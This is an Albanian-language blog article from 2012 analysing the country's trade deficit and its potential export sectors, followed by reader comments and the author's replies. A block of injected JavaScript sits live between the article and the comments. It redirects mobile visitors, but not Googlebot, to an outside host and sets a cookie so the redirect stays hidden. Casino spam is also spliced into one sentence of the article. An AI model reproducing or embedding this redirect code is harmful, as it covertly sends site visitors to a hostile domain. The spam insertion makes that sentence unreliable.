Konkurrenca e sektorëve shqiptarë

Bilanci tregtar dhe panorama e eksporteve shqiptare: Cilët jane sektorët ku mbështetet dhe si mund të nxiten!

Ekonomia shqiptare në bazën e saj paraqet një deficit të thellë tregtar, shkaktuar nga një mungesë e zhvilluar e prodhimit vendas. Në bazë vjetore, në vitin 2011 deficiti tregtar prej 323 mld lekësh përfaqësonte rreth 22% të Prodhimit të Brendshëm Bruto (PBB). Nga viti 2005 e në vazhdim vlera e bilancit tregtar negativ thuajse dyfishohet ndërkohë që PBB zyrtar rritet me rreth 30% (ref. Instat). Kjo e dhënë duhet interpretuar edhe në dritën e një përmirësimi të transparencës fiskale doganore lidhur kryesisht me importet, e cila në çdo rast mbetet jo e plotë, duke lënë hapësira për një marzh të konsiderueshëm modifikimi në rritje të defiçitit tregtar efektiv në raport me atë të raportuar. Të gjitha shifrat flasin për një vlerë eksportesh që në vitin 2011, edhe sipas raportimit zyrtar, nuk zë më shumë se 38% të importeve dhe 13% të PBB. Eshtë e qartë se Shqipëria është kryesisht një vend importues. Por cilët janë faktorët në bazë të mungesës së kompetitivitetit të sektorëve dhe produkteve “ Made in Albania”?

Sipas të dhënave zyrtare, pothuajse të gjithë makrosektorët e ekonomisë shqiptare gjenerojnë defiçit tregtar. Por sektorët që kontribuojnë më shumë janë sektori i industrisë ushqimore dhe pijeve, sektori i makinerive dhe pjesëve të këmbimit, sektori kimik dhe plastik.

Për të kuptuar arsyet e mungesës së eksporteve duhet së pari të analizojmë çfarë i stimulon ato në kontekstin ekonomik të një vendi.

Në princip një vend mund të jetë kandidat për eksportin e një të mire ekonomike në rrethanat e mëposhtme:

  1. Në rastin e një avantazhi lidhur me një kategori të kostove fikse të një produkti të prodhuar (si psh. Kosto e punës, Kosto e energjisë, etj)
  2. Në rastin kur përmasat e tregut vendas apo rajonal mundësojne ekonomitë e shkallës.
  3. Në rastin në të cilin ky vend zotëron të mira e burime të pamjaftueshme në botë (si psh rezervat minerare apo te naftës, burimet hidrike, etj)

Së pari, ekonomia shqiptare si çdo ekonomi në zhvillim me nivele akoma të konsiderueshme papunësie (13.7% sipas të dhenave zyrtare) karakterizohet nga një kosto mesatare e ulët e fuqisë punëtore në raport me Europën Perëndimore. Kjo mundëson shfrytëzimin e këtij avantazhi në industri përpunuese akoma pak të automatizuara, ku kapitali njerëzor luan një rol të rëndesishem në realizimin e produktit apo shërbimit. Nje nga industritë më përfaqësuese në kategoritë e lartpërmendura është industria tekstile, që paraqitet si i vetmi makrosektor i ekonomisë shqiptare me një balance tregtare pozitive në favor të eksporteve. Biznesi më përfaqësues i kësaj industrie është “Fasoni”, ose ndryshe biznesi i përpunimit, qepjes dhe asemblimit në produkte përfundimtare të materialeve gjysëm të gatshme për artikuj tekstilë si këpucet, çantat, etj. Lënda e parë e kësaj industrie është tërësisht e importuar pra mund ta konsiderojmë një rast të mirëfilltë eksporti të vlerës së shtuar përmes krahut të lirë të punës.

 Nje rast i ngjashëm eksporti shërbimesh bazuar në tregun e lirë të punës është ai i eksternalizimit në Shqipëri të shërbimit të Call Center-ave të një sërë kompanish nga vende perëndimore fqinje, kryesisht Italia. Eksternalizimi i aktiviteteve përpunuese në Shqipëri nga kompani europiane është i favorizuar veç nivelit të ulët të pagave (paga minimale mujore e referimit ne Shqipëri sot për punëtorë të pakualifikuar është 20,000 lekë) dhe nga sistemi fiskal relativisht i lehtë për pjesën e taksimit të punës (taksimi total i pagës për punëmarrësin 21.2% dhe për punëdhënësin 16.7%)  apo të fitimit ekonomik (tatimi mbi fitimin 10%). Avantazhi i lidhur me fuqinë e lirë punëtore është gjithsesi disi i përkohshëm në prespektivën e integrimit të Shqipërisë në Komunitetin Europian dhe unifikimit të tregjeve të punës, që gradualisht në të ardhmen afatgjatë, pritet të gjenerojë reduktim të ndjeshëm të diferencave në nivelin e pagave në tregun e ri të zgjeruar europian. Shenjat e para të këtij provizorizmi vihen re me liberalizimin e vizave që ka mundësuar lëvizjen e lirë, edhe pse akoma jo për motive pune, të shqiptarëve dhe automatikisht një humbje të lehtë, që në këtë fazë, të avantazhit të bizneseve që përdorin krahun e lirë të punës (sipas deklaratave publike të disa përfaqësuesve të Fasonit shqiptar).

Së dyti, një vend mund të jetë kandidat për eksportin e një të mire ekonomike në rastin kur po ky vend mundëson ekonomitë e shkallës që mund të shfrytezohen në sektorë të caktuar. Ekonomia e shkallës bazohet në principin e reduktimit  të kostove fikse për njësi prodhimi (tipike janë kostot e prodhimit në industritë e automatizuara) me rritjen e volumeve të prodhimit dhe shitjes. Fuqia blerëse shqiptare mbështetet në një popullsi tej mase casino online të vogël prej 2.8 milionë banorësh (INSTAT – 2011). Një treg i brendshëm kaq i limituar e bën të pashfrytëzueshëm avantazhin kompetitiv që buron nga volumet dhe ekonomitë e shkallës. Për këtë arsye, sektorët që paraqesin defiçitin më të madh tregtar janë ato “capital intensive” si sektori i makinerive dhe pjesëve të këmbimit, sektori kimik dhe plastik por edhe ai i pijeve, të gjitha industri të automatizuara, kompetitiviteti i të cilave mungon nëse tregu i brendshëm i një vendi nuk favorizon volumet. Në këtë prizëm, pakti CEFTA i tregtisë së lirë që parashikon taksa doganore zero reciprokisht mes Shqipërisë dhe vendeve fqinje është i një rëndësie strategjike në zgjerimin e tregut tek i cili mund të mbështeten industritë e automatizuara. Por në çdo rast, këto mbeten kryesisht industri që gjenerojnë produkte të destinuara për t’u importuar në një vend të vogël si Shqipëria.

Atëherë, ku mbetet të bazohet zhvillimi i eksporteve shqiptare?

Në analizë të fundit, avantazhi i qëndrueshëm afatmesëm dhe afatgjatë i një ekonomie si ajo shqiptare nga pikëpamja e eksporteve mbetet ai që buron nga rezerva dhe pasuri natyrore apo karakteristika klimaterike tipike të vendit. Kompozicioni morfologjik i Shqipërisë, përbërë në 75% të territorit nga riliev malor me një nëntokë të pasur, paraqet dy sektorë strategjikë për eksportin: sektori minerar dhe sektori energjitik.

I pari mbështetet në nëntokën malore me prezencë të konsiderueshme të një sërë mineralesh ndër të cilët më i rëndësishmi Krom Ori, i një cilësie nga më të çmuarat në nivel botëror. Nëntoka shqiptare është gjithashtu e pasur në rezerva minerare bakri, nikeli, hekuri etj. Rezervat totale të mineralit të kromit vlerësohen nga USGS (US Geological Survey) në 36 mln tonë, ndërsa sot ekstraktohen jo më shumë se 0.27 mln tonë në vit ose 0.6% e tyre, me një potencial të madh eksporti drejt Europës por kryesisht drejt vendeve aziatike dhe Kinës, ku industria e ndërtimit po zhvillohet me ritme marramandëse dhe rezervat e kromit, mineral bazë për forcimin e konstruksioneve të çelikut, janë të limituara. Për keto arsye ky sektor duhet nxitur me prioritet duke rritur numrin dhe lehtësuar dhënien e koncesioneve veçanërisht subjekteve në gjendje të mbështesin financiarisht projekte zhvillimi, si dhe duke shtuar në tërësi incentivat shtetërore për zhvillimin e industrisë së pasurimit të mineraleve të ndryshme.

Ndër rezervat e nëntokës shqiptare vlen të përmendet dhe nafta, që vlerësohet në një sasi totale prej 426 mln fuçi nga Bankers Petrolium (shoqeri kanadeze ne Shqiperi prej 2004-es) nga të cilat vetëm 4.8 mln fuçi prodhuar mesatarisht çdo vit. Aktualisht sapo ka përfunduar proçesi i privatizimit të kompanisë shtetërore që shfrytëzonte pellgun më të madh naftëmbajtës të Patos – Marinzës, që pritet t’i hapë rrugën një shfrytëzimi më efiçent të kësaj pasurie natyrore.

Një sektor tjetër i rëndësishëm është ai i hidroenergjisë, i cili mbështetet në pasurinë ujore shqiptare. Sot Shqipëria vazhdon të importojë energji elektrike për të plotësuar nevojat e brendshme. Veç dhënies së konçesioneve për HEC-e që ka nisur aktivisht prej disa vitesh, nderhyrja e shtetit duhet të konsistoje së pari në konsolidimin e një platforme legjislative incentivuese, që të lehtësojë financimet e projekteve energjitike dhe të mundësojë shndërrimin e të drejtave të konçesionit në shfrytëzim efektiv të këtyre të drejtave.  Sot legjislacioni favorizon prodhimin në hidrocentrale të vogla (deri në 15 Mwatt kundrejt 10 Mwatt në Europë) pasi parashikohet një detyrim i shtetit për të blerë tërësisht prodhimin e tyre. Nga ana tjetër, duhet të planifikohen ndërhyrje legjislative korrigjuese me qëllim lehtësimin e proçesit të financimit të projekteve energjitike (si psh: njohja si kolateral i turbinave dhe materialeve të tjera të ndërtimit për HEC-et nga ana e institucioneve financiare investuese, sot e pamundur sipas ligjit në fuqi).

Së fundi, klima mesdhetare dhe kushtet e favorshme atmosferike favorizojnë rritjen e një sërë kulturash bujqësore me një cilësi të lartë, si ulliri, gruri e një sërë drithërash, fruta të thata, etj. Reforma bujqësore, zgjidhja e problemeve të pronësisë së tokës si dhe skema të caktuara fiskale për prodhuesit e vegjël do të jenë hapat e parë të rëndësishëm në nxitjen e prodhimit të këtyre kulturave, për plotësimin e nevojave të brendshme dhe eventualisht për qëllime eksporti. Në të ardhmen, veçanërisht pas eliminimit të problemeve të brendshme të lidhura kryesisht me privatizimin e tokës, pritet të rritet dhe vlera e subvencioneve nga ana e institucioneve europiane për zhvillimin e këtij sektori. Sot sektori ushqimor mbetet një nga sektorët që prodhojnë rreth 25% të deficitit tregtar kombëtar, në të njëjtin nivel me sektorin e makinerive dhe paisjeve industriale.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

15 thoughts on “Konkurrenca e sektorëve shqiptarë

  • May 21, 2012 at 1:58 pm
    Permalink

    Se pari dua tju pershendes per artikullin i cili na paraqet nje panorame te avantazheve potenciale kompetitive te ekonomise shqipetare… Me pas doja te kaloja me 2 pyetje.. Mendoni se per energjitiken pervec burimeve Hidrike mund te jemi kompetitiv dhe me energjine e eres dhe ate diellore dhe a ka projekte konkrete ne kete drejtim ? Per sa i perket bujqesise , ju theksoni se hapi i pare eshte zgjidhja e problemeve mbi pronesine. Mendoni se tashme pas nje 20 vjeteve kapitalizem ka nje reforme afategjate kredibel e cila sjell ne zgjidhjen e ketij problemi. FLM

    • May 21, 2012 at 5:21 pm
      Permalink

      Faleminderit per komentin. Ne lidhje me forma energjie alternative (vecanerisht ne rastin e asaj diellore qe do te mund te shfrytezohej me se miri ne Shqiperi), mendoj qe zhvillimi eshte ngushtesisht i lidhur me incentivat shteterore, pasi investimet qe duhet te ndermerren per realizimin e ketyre formave te energjise jane te permasave te medha dhe kosto e prodhimit per Kwh rezulton rreth 5 here me e larte se ajo e energjise hidrike apo termike. Sot Bashkimi Europian incentivon ne menyre direkte kompanite qe investojne ne projekte te tilla ne shtetet anetare, duke i kompensuar ne permase te konsiderueshme per cdo njesi prodhimi te realizuar; Shqiperia eshte akoma larg ketij realiteti por ne momentin e integrimit ne BE ndoshta do te mund te konsiderohet.
      Per sa i perket problemit te pronesise, mbetet i pazgjidhur pasi ligji i fundit mbi privatizimin e tokes per menyren si eshte formuluar nuk ka mundur te behet i zbatueshem efektivisht ne menyre uniforme ne te gjithe territorin shqiptar. Nje reforme teresore duhet te ndermerret ne kete drejtim.

  • May 21, 2012 at 4:57 pm
    Permalink

    bravo per artikullin …nje sugjerim teknik : analiza do merrte tjeter sens po te perfshiheshin eksteranlitetet negative te ketyre sektoreve-keshtu sektoret “ndotes tipik”(po jo vetem) ndertimi ,minerare,naftenxjerres perpuneues , do te shikonim qe kane nxjerre perfundimisht jashte loje sektoret buqesore psh ne nje pjese te madhe te territorit. ndertimi ka shkaterruar assete me vlera te pallogaritshme ferma ,dru frutore ,ullishta…. (ne dhermi ska me agrume ) dhe eksternaliteti i eshte kthyer mbrapsht edhe vete sektorit qe e prodhoi ndertimit (shiko saranden durresin plazh etj….perfundimisht te parekuperueshem)-pra kemi edhe auto kanibalizim brenda sektorial ,ose nje rreth vicioz ekstrem

    Rezultati kam frike se do dale negativ … ne sensin qe sektoret ne “konkurrence” me njeri tjetrin kane shkaterruar assete me vlera e mundesi kthimi shume here me te medha e te sigurta se sektoret aktual kryesues te cilet veshtire se kane te ardhme : madje disa jane edhe “piramidal” : ndertimi i pari ,fasoni nje pjese e konsiderueshme ,turizmi 1 muaj ne vit mbushet jugu e nja 2-3 muaj durresi e veriu, kush i ka me kredi e ka automatikissht te pamundure te paguaje ….piramide i themi me duket 🙂

    • May 21, 2012 at 5:26 pm
      Permalink

      Erdit faleminderit per komentin. Jam dakord..cdo zhvillim, perfshire ate te industrise minerare (qe nuk mund te mbetet e pashfrytezuar ne Shqiperi pasi nje vend kaq i vogel me kete perqendrim pasurie nentokesore eshte relativisht i rralle) ,… duhet te jete “sustainable” dhe te behet duke respektuar standardet nderkombetare lidhur me sektorin perkates me vemendje te plote ndaj faktorit ambiental. Gjithsesi nese investitoret jane serioze dhe te incentivuar ne menyren e duhur nga shteti ne te gjithe sektoret strategjike per ekonomine, konvergjenca do te jete gjithnje e me shume drejt nje realiteti ku keta sektore te zhvilluar perkatesisht ne menyren e duhur, do mund te bashkejetojne me se miri. Bilanci ekonomik per vendin do te jete pozitiv, me kusht qe zhvillimi te realizohet ne menyren e duhur.

  • May 21, 2012 at 7:27 pm
    Permalink

    Per pergjigjen e pare, ne si neighbourhood country i BE-se ( duke qene se kemi hyre ne programet e integrimit) nuk kemi mundesi te perfitojme nga programet e BE-se per energjite rinovabel? Per pergjigjen e dyte nese une do te isha nje investitor i huaj si mund te gjeja nje cmim referencial per sa mund te kushtonte nje prone ne shqiperi dhe a mund te kisha siguri ne termin e te drejtes se pronesise. Me fal per mundimin por me interesojne shume pergjigjet tuaja per kete ceshtje.

    • May 21, 2012 at 11:41 pm
      Permalink

      Elton, faleminderit serish. Ne fatkeqesisht nuk mund te perfitojme akoma nga programe te tilla incentivuese; kushti eshte anetaresia ne BE. Ndersa ne lidhje me referimin mbi cmimet e pronesise, varen shume nga zonat qe konsiderohen per investimin. Per nje informacion te plote mbi cmimet mund te kontaktohen agjente imobiliare lokale ose kompani konsulente per tregun imobiliar (mund te permend Colliers Albania si nje nga kompanite qe operojne ne menyre profesionale ne sektor ). Mendoj se titulli i pronesise duhet t’i nenshtrohet gjithmone nje kontrolli te imtesishem perpara perfundimit te procesit te blerjes

  • May 21, 2012 at 8:34 pm
    Permalink

    Pershendetje Eda,

    Pergezime per shkrimin. Me bie ne sy disa gjera nga ky shkrim:

    1. “nga sistemi fiskal relativisht i lehtë për pjesën e taksimit të punës (taksimi total i pagës për punëmarrësin 21.2% dhe për punëdhënësin 16.7%)” – me duket se keto shifra jane me te ulta: keshtu i bie qe nje page X t’i zbritet 40% kontribute nga ana e punemarresve dhe punedhenesve nderkohe qene mos gaboj, te dyja bashke shkojne diku tek 24%.

    2. “Economies of scale” une do e kisha perkthyer “kursime te konsiderueshme ne kosto” ose “ekonomi te konsiderueshm tek kostot” – ‘ekonomi te shkalles’ nuk besoj se e percjell qarte idene tek lexuesi qe nuk ka lexuar me pare ne anglisht mbi kete teme.

    3. Thelbi i artikullit nuk me duket i qortueshem.

    Mbase u fokusova me shume ne detaje se sa ne boshtin kryesor te tekstit, megjithate kjo tregon qe e kam lexuar me vemendje artikullin – dhe prej eksperiences di qe kjo pergjithesisht e gezon autorin 🙂

    Uroj qe skrimi tjeter te mos vonoje shume.

    R.

    • May 21, 2012 at 11:47 pm
      Permalink

      Rudi ju falenderoj per leximin e vemendshem te artikullit dhe komentet.
      Ne lidhje me piken 1.,mund te konsultoni ne sitin http://www.tatime.gov.al nen kategorine “Legjislacioni Tatimor ne fuqi” piken III te Vendimit Nr.1114, date 30.07.2008 I Ndryshuar. Do te shihni qe shifrat e paraqitura ne artikull jane te sakta.
      Ne lidhje e piken 2. te falenderoj per sygjerimin. Termi ekonomik eshte “Ekonomi shkalle” dhe jam munduar te percjell me saktesi kuptimin e ketij termi. Por saktesimi eshte i vlefshem.
      Faleminderit gjithashtu per mendimi e shprehur ne piken 3.

  • May 21, 2012 at 10:32 pm
    Permalink

    Se pari deshiroj t’ju pergezoj per fillimin e ketij blogu teper te domosdoshem per zhvillimin e mendimit ekonomik ne Shqiperi si dhe per shkrimin tuaj teper informues e te perpikte. Ne te njejten kohe mendoj se shkrimi juaj ka nje fryme teper pozitive duke anashkaluar ne nje fare menyre burimet strukturore e qendrueshmerine e deficitit tregtar shqiptar.

    Ndaj te njejtin mendim me ju se avantazhi kryesor i funksionit te prodhimit te Shqiperise per momentin eshte krahu i lire i punes. Matjet statistikore te indeksit te specializimit (matja e fundit e vitit 2008 gjendet ne Raportin e Politikes Monetare per Tremujorin e Trete te Vitit 2010, Hapesira Informuese 3: Qendrueshmeria e Eksporteve) te disa prej industrive me karakter ri-eksportues te vendit tone tregojne per avantazhin tone konkurrues mbi disa prej vendeve te rajonit. Nuk duhet te harrojme se ligji gravitacional i tregtise favorizon ekspanisonin e aktivitetit tregtar te vendit tone me vendet e BE-se si Italia e Greqia. Ne te njejten kohe, perdorimi i gjuhes italiane prej nje pjese te madhe te popullsise vendase ka ndihmuar ne perhapjen e biznesit te Call Centre ne Shqiperi.

    Por nuk duhet te harrojme se keto dy industri nuk favorizojne terheqjen dhe zgjerimin e kapitalit njerezor ne vend (eksternalitetet e diturise) dhe adoptimin e teknologjive te reja prodhuese (eksternalitetet teknologjike) te cilat njihen empirikisht te nidhmojne rritjen e prodhueshmerise te kompanive furnizuese ose zinxhir. Njekohesisht, duhet theksuar se vlera e shtuar e produktit te industrise ri-eksportuese te fasonit eshte gjithsesi e ulet ndersa ajo e sherbimit Call Centre eshte akoma me e ulet. Zhvillimi i teknikes se prodhimit shqiptar drejt krijimit te mallrave me te sofistikuara e me vlere me te larte te shtuar me qellim rritjen e eksportit ne matjen e PBB-se duhet te bazohet ne politika te mirefillta industriale zyrtare ose ne mbrojtjen e nxitjen e kompanive te sapoformuara (Rasti me studiuar akademik Korea e Jugut gjate viteve 70’). Studime te ndryshme kane deshmuar se zhvillimi i produkteve ne halkat me te larta te prodhimit rrit drejtperdrejte pasurine per fryme te nje vendi [Hausmann, Hwang, Rodrik (2005), ‘Why what you export matters’, NBER Working Paper 11905]. Keto te fundit jane probleme politike te cilat per shkak te veshtiresise ne formulim lipsin largpamesi dhe perpikmeri te politikberesve.

    Per sa i perket Marreveshjes se Tregtise se Lire te Evropes Qendrore te dhenat kane treguar ne pergjithesi per nje thellim te vazhdueshem te deficitit tregtar te vendit tone me vendet e tjera anetare (Me shume te dhena mbi tregtine sipas HS deri ne 10 shifra mund te merren nga UN Comtrade). Ketu vlen te perjashtohet vetem bilanci pozitiv me Kosoven. Ndonese, ndryshimi I politikes tregtare pas hyrjes ne CEFTA perben nje eksperiment te mirefillte rastesor per te vleresuar lidhjet shkakesore te ecurise tregtare midis vendeve anetare, une nuk di te jete kryer ndonje i tille per te analizuar rastin e Shqiperise. Te dhenat e paperpunuara tregojne per nje rritje te importeve tona prej ketyre vendeve, cka eshte e kuptueshme kur merren parasysh diferencat e medha ne konkurrueshmeri, ne fuqine prodhuese te firmave te huaja dhe ne kohezgjatjen e tyre ne treg. Per me tej, fqinji yne jugor eshte rasti me konkret i mungeses se konkurrueshmerise ne tregun e bashkuar Evropian dhe pasojat ekonomike qe ajo sjell (ketu po anashkaloj problemet e thella strukturore te Greqise). Pra, mendoj qe aderimi yne ne BE nuk do na sjelle me shume fat nese nuk drejtojme te gjitha politikat ekonomike drejt konvergimit te tregjeve e metodave tona te prodhimit te pakten me vendet anetare ne BE post-2004.

    Gjate viteve te fundit politikat nxitese ndaj biznesit kane ndihmuar ne rritjen e pershpejtuara te Investimeve te Huaja Direkte drejt vendit tone. Megjithate, te dhenat kumulative te IHD-ve tregojne per nje perqendrim ne sektorin e sherbimeve (kryesisht telekomunikacion e finance si pasoje e kapitalit te huaj ne kompanite telefonike, celulare, banka e institucione financiare; me shume te dhena ne raportet statistikore te Bankes se Shqiperise) por me pak ne sektoret prodhues. Politika afatgjate per ruajtjen e qendrueshmerise se llogarise korente te vendit do te ndihmohej prej zgjerimit te IHD-ve ne sektorin prodhues, ku do te mund te nxitej rritja e eksportit te mallrave dhe ngushtimi i deficitit tregtar. Ne te njejten kohe, studimet empirike identifikojne mbrojtjen e drejtave te pronesise (property rights), shtetin ligjor, respektimin e kontratave e klimen e sigurise makroekonomike si elemente kryesore shkakesore te rritjes se IHD-ve ne nje vend (Li, Quan and Adam Resnick 2003. “Reversal of Fortunes: Democracy, Property Rights and Foreign Direct Investment Inflows in Developing Countries.” International Organization 57(1):1-37). Ndonese vendi yne ka bere mjaft hapa para ne keto aspekte institucionale akoma mbetet mjaft per t’u bere me qellim arritjen e standarteve me te larta nderkombetare. Rrjedhimisht, cilesia, eksternalitetet pozitive dhe perfitimiet sociale te IHD-ve aktuale ne vendin tone duhet te shihen me me sy kritik. Nje problem i perafert parashtrohet ne kuader te analizes se sektorit energjitik e atij mineral. Ndonese, numri i larte i koncensioneve rrit pritshmerite pozitive, mbeten akoma per t’u pare efektet reale te ketyre sektoreve ne deficitin tregtar te vendit. Me sa mbaj mend Shqiperia regjistroi nje bilanc pozitiv te zerit ‘Lende djegese e minerale’ ne statistikat e tregtise se jashtme te publikuara prej INSTAT dhe Bankes se Shqiperise gjate vitit 2010 si pasoje e bilancit pozitiv te energjise elektrike.

    Perseri ndaj mendimin me ju se sektorit bujqesor duhet t’i jepet me shume prioritet prej politikeberesve. Se bashku, me permiresimin e ligjit te pronesise (I cili me duket paksa proces i shkaterruar tashme pas 20 vjetesh), do te shtoja domosdoshmerine e automatizimit te procesit te regjistrimin me qellim menjanimin e lojes se piset, sjelljen e teknologjive per shtimin te korrurave gjate gjithe vitit (menjanimin e efektit sezonal qe ndikon ne rritjen e pershpejtuar te ofertes, renien e cmimit e per pasoje uljen e fitimeve), zgjerimin e teknologjive per shtimin e jetegjatesise se produkteve si dhe krijimin e linjave tregtare me vende me te zhvilluara ku dhe marzhet e fitimit jane me te larta.

    Se fundmi, dy pika te tjera te cilat mendoj e ulin disi veshtrimin afatmesem teper pozitiv mbi ecurine e ekonomise shqiptare. Duhet te kemi parasysh qe ekonomia e politika jane te lidhura ngushte ne vendin tone e nuk mund te analizohen kollaj te vecuara. Perqendrimi drejt fitimeve afatshkurter dhe rente-kerkues I njeres mund te paralizoje zhvillimin afatgjate e te qendrueshem te tjetrit. Njekohesisht, kriza ekonomike ne Greqi e cila po e ben te pashmangshme daljen e tyre prej zones Euro dhe masat tejet shtrenguese fiskale ne Itali mendoj do te kene efekte te pashmangshme ne ekonomine shqiptare. Megjthese, tregtaret shqiptare arriten te diversifikonin ekspozimin e tyre drejt tregjeve me dinamike pas krizes financiare te vitit 2008, aktiviteti yne tregtar mbetet ende i lidhur ngushte me keto dy vende fqinje.

    Deshiroj t’ju kerkoj ndjese per komentin teper te gjate dhe ju falenderoj edhe njehere per nisjen e ketij blogu qe shpresoj te ndikoje sa me shume ne rritjen e analizave ekonomike mbi vendin tone e me gjere.

    • May 24, 2012 at 5:23 pm
      Permalink

      Atehere Kika, me fal per pergjigjen e vonuar ne mungese kohe. Faleminderit se pari per komentin e plote dhe mjaft konstruktiv.
      Shkurtimisht mbi disa nga pikat qe permend:

      Ne artikull kosto e ulet e “Krahut te punes” nuk konsiderohet nje avantazh strategjik i eksporteve shqiptare por nje avantazh i momentit te ciklit ekonomik te vendit dhe i perkohshem per menyren se si prospektohet zhvillimi i ardhshem i vendit. Jam e nje mendimi me ty qe kur behet fjale per rieksport me vlere te shtuar vetem punen njerezore, deficiti tregtar ndihmohet pak pasi kjo vlere per
      njesi prodhimi rezulton e ulet. Persa i perket aplikimit te teknologjive te reja per realizimin e nje produkti me vlere te shtuar me te larte, do te te riktheja te pika e dyte e e trajtuar ne artikull, ajo e pamundesise se Shqiperise per te perfituar nga ekonomite e shkalles. Fatkeqesisht kapitali teknologjik kushton dhe tregu shqiptar nuk permbush ate mase kritike qe do te ishte e nevojshme per te shfrytezuar kete avantazh.
      Ne lidhje me piken e dyte, jam dakord me ty qe nje pakt tregtie te lire eshte vetem pikenisja, krijon nje platforme te zgjeruar per te shfrytezuar potencialisht me
      mire avantazhe te mundshme te lidhura me shkallen e prodhimit. Kompetitiviteti i strukturave ekonomike te vendeve anetare perben me pas diferencen e vertete mes atyre qe arrijne te perfitojne nga ky avantazh dhe atyre qe nuk arrijne te perfitojne.
      Duhet theksuar se ne rastin e Shqiperise kundrejt vendeve si Kosova ekziston dhe nje disavantazh tjeter: Ne rastin ne te cilin produktet qe rieksportohen ne Kosove kane origjine europiane ( kjo ndodh per shembull per ambalazhet qe nuk perpunohen por hyjne te lendet e para te produkteve qe eksportohen – shembull shishet e qelqit) kjo e fundit, edhe pse ka nje pakt taksimi zero me Shqiperine, keto artikuj i takson pasi origjina e tyre e pare eshte europiane. Nuk vlen e njejta gje per marredhenien e anasjellte pasi Shqiperia, ne ndryshim nga Kosova, ne saje te akordeve europiane te nenshkruara, nuk aplikon taksa doganore per shume artikuj me origjine europiane.Ky realitet pra shton nje element disavantazhi te Shqiperise ndaj Kosoves ne marredheniet tregtare mes dy shteteve.
      Se fundi, nuk mund te mos ndaj mendimin tend mbi faktin qe politika te orientuara ndaj zhvillimeve afatshkurtra mund te cenojne rende linjat e zhvillimit te paraqitura si te mundshme. Ama shpresa mbetet qe ne rrugetimin drejt nje Europe te integruar, nevoja e konformimit me kerkesat e Bashkimit Europian dhe pjeses tjeter te botes perendimore te paraqitet si detyruese per politika te pashendetshme e ne kete menyre te nxise implementimin e reformave.
      Se fundi, une mendoj gjithashtu qe impakti i krizes ne Greqi dhe Itali eshte absolutisht fatal per ekonomine shqiptare, e cila perdor masivisht remitancat per te kompensuar nje pjese te mire te deficitit tregtar.Por mendoj edhe qe sa me i madh te jete ndergjegjesimi publik per kete, aq me te forte behen incentivat per nje ristrukturim te shendetshem te te gjithe sektoreve kritike dhe nxitje te rritjes ekonomike.

  • May 22, 2012 at 9:13 am
    Permalink

    Rudi, “ekonomite e shkalles” eshte term gjeresisht i perorur ne gjithe literaturen ekonomike ne shqip prej shume vitesh. Edhe ne fakultet ai term mesohej.
    Urime Edes per shkrimin interesant!

    • May 22, 2012 at 7:24 pm
      Permalink

      Gj., nga nje kerkim i shpejte ne google vura re qe ky term qenka shume me i perdorur nga ç’mendoja une… Vazhdoj te mendoj qe nuk e percjell mire idene si term – por duke pare karaktrin dytesor te verejtjes s’po zgjatemi me shume.

      R.

  • May 24, 2012 at 9:48 pm
    Permalink

